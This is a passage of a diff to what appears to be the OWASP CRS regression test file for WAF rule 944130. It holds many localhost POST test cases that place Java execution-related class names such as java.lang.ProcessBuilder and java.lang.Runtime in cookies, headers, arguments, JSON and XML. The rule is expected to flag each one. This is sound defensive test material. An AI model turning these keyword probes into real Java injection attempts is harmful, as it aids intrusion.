"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.ProcessBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-331 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 331 desc: "Argument test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-332 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_id: 332 desc: "Argument name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-333 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log_contains: "id \"944130\"" + - test_id: 333 desc: "Cookie test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-334 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 334 desc: "Cookie name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.reflect=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-335 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 335 desc: "Request header test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-336 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 336 desc: "XML attribute value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-337 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 337 desc: "XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-338 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_id: 338 desc: "Nested XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-339 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_id: 339 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-340 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_id: 340 desc: "Content-Type application/json arg value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.reflect\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-341 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log_contains: "id \"944130\"" + - test_id: 341 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.reflect\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-342 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 342 desc: "Argument test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-343 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_id: 343 desc: "Argument name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-344 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944130\"" + - test_id: 344 desc: "Cookie test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-345 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 345 desc: "Cookie name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-346 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 346 desc: "Request header test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-347 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 347 desc: "XML attribute value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-348 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 348 desc: "XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-349 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_id: 349 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-350 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_id: 350 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-351 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_id: 351 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Runtime\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-352 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log_contains: "id \"944130\"" + - test_id: 352 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Runtime\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-353 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 353 desc: "Argument test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-354 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_id: 354 desc: "Argument name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-355 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log_contains: "id \"944130\"" + - test_id: 355 desc: "Cookie test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-356 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 356 desc: "Cookie name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.String=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-357 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 357 desc: "Request header test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-358 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 358 desc: "XML attribute value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: 